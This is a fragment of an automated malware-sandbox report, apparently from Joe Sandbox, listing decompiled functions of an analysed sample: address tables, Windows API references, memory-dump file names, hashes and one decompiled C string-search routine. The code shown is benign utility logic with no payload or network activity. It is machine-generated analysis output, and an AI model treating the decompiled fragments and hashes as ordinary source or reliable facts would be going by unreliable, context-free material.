                                  0x100011fb
                                  0x100011fb
                                  0x00000000
                                  0x100011d8
                                  0x10001140
                                  0x10001143
                                  0x00000000
                                  0x00000000
                                  0x10001149
                                  0x1000114c
                                  0x1000119b
                                  0x00000000
                                  0x1000119b
                                  0x1000114f
                                  0x10001150
                                  0x10001183
                                  0x00000000
                                  0x10001183
                                  0x00000000
                                  0x100011ba
                                  0x100011ba
                                  0x00000000
                                  0x100011c3

                                  APIs
                                    • Part of subcall function 1000123B: lstrcpyA.KERNEL32(00000000,?,?,?,100014DE,?,10001020,10001019,00000001), ref: 10001258
                                    • Part of subcall function 1000123B: GlobalFree.KERNEL32 ref: 10001269
                                  • GlobalAlloc.KERNEL32(00000040,?), ref: 1000115B
                                  • GlobalFree.KERNEL32 ref: 100011B4
                                  • GlobalFree.KERNEL32 ref: 100011C7
                                  • GlobalFree.KERNEL32 ref: 100011F5
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.798233791.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                  • Associated: 00000000.00000002.798214888.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                  • Associated: 00000000.00000002.798250041.0000000010003000.00000002.00000001.01000000.00000005.sdmpDownload File
                                  • Associated: 00000000.00000002.798280096.0000000010005000.00000002.00000001.01000000.00000005.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_10000000_SC.jbxd
                                  Similarity
                                  • API ID: Global$Free$Alloclstrcpy
                                  • String ID:
                                  • API String ID: 852173138-0
                                  • Opcode ID: c9149b92212d33adc4212204361ca6219cf995c9886f0e0edac76aa4d1876c43
                                  • Instruction ID: 26a7307167ea038f6128c28db1d5d02e0c11c1c5116c5a7ce728bb40d8b914e2
                                  • Opcode Fuzzy Hash: c9149b92212d33adc4212204361ca6219cf995c9886f0e0edac76aa4d1876c43
                                  • Instruction Fuzzy Hash: E431BAB2808254AFF705CF64EC89AEA7FE8EB052C0B164116FA45D626CDB349910CB28
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 004057AB Relevance: 5.0, APIs: 4, Instructions: 37stringCOMMON
                                  Download Yara Rule
                                  C-Code - Quality: 100%
                                  			E004057AB(void* __ecx, CHAR* _a4, CHAR* _a8) {
				int _v8;
				int _t12;
				int _t14;
				int _t15;
				CHAR* _t17;
				CHAR* _t27;

				_t12 = lstrlenA(_a8);
				_t27 = _a4;
				_v8 = _t12;
				while(lstrlenA(_t27) >= _v8) {
					_t14 = _v8;
					 *(_t14 + _t27) =  *(_t14 + _t27) & 0x00000000;
					_t15 = lstrcmpiA(_t27, _a8);
					_t27[_v8] =  *(_t14 + _t27);
					if(_t15 == 0) {
						_t17 = _t27;
					} else {
						_t27 = CharNextA(_t27);
						continue;
					}
					L5:
					return _t17;
				}
				_t17 = 0;
				goto L5;
			}









                                  0x004057bb
                                  0x004057bd
                                  0x004057c0
                                  0x004057ec
                                  0x004057c5
                                  0x004057ce
                                  0x004057d3
                                  0x004057de
                                  0x004057e1
                                  0x004057fd
                                  0x004057e3
                                  0x004057ea
                                  0x00000000
                                  0x004057ea
                                  0x004057f6
                                  0x004057fa
                                  0x004057fa
                                  0x004057f4
                                  0x00000000

                                  APIs
                                  • lstrlenA.KERNEL32(00000000,?,00000000,00000000,?,00000000,004059BD,00000000,[Rename]), ref: 004057BB
                                  • lstrcmpiA.KERNEL32(?,?,?,00000000,004059BD,00000000,[Rename]), ref: 004057D3
                                  • CharNextA.USER32(?,?,00000000,004059BD,00000000,[Rename]), ref: 004057E4
                                  • lstrlenA.KERNEL32(?,?,00000000,004059BD,00000000,[Rename]), ref: 004057ED
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.781737895.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.781719139.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.781774465.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.781799643.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.781799643.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.781799643.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.781799643.0000000000443000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.782001442.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_SC.jbxd
                                  Similarity
                                  • API ID: lstrlen$CharNextlstrcmpi
                                  • String ID:
                                  • API String ID: 190613189-0
                                  • Opcode ID: 4d6aa7fcecb591248e5394db533e431d238a5c46998e6b160d14a30e062bce79
                                  • Instruction ID: 633aa132607d7e7766888a4b0686c97eac652c3b38f96583b17865bee0a85c35
                                  • Opcode Fuzzy Hash: 4d6aa7fcecb591248e5394db533e431d238a5c46998e6b160d14a30e062bce79
                                  • Instruction Fuzzy Hash: D7F06236504518FFD712DBA5DD4099FBBA8EF05350F2540B9E800F7250D674EE01ABA9
                                  Uniqueness

                                  Uniqueness Score: -1.00%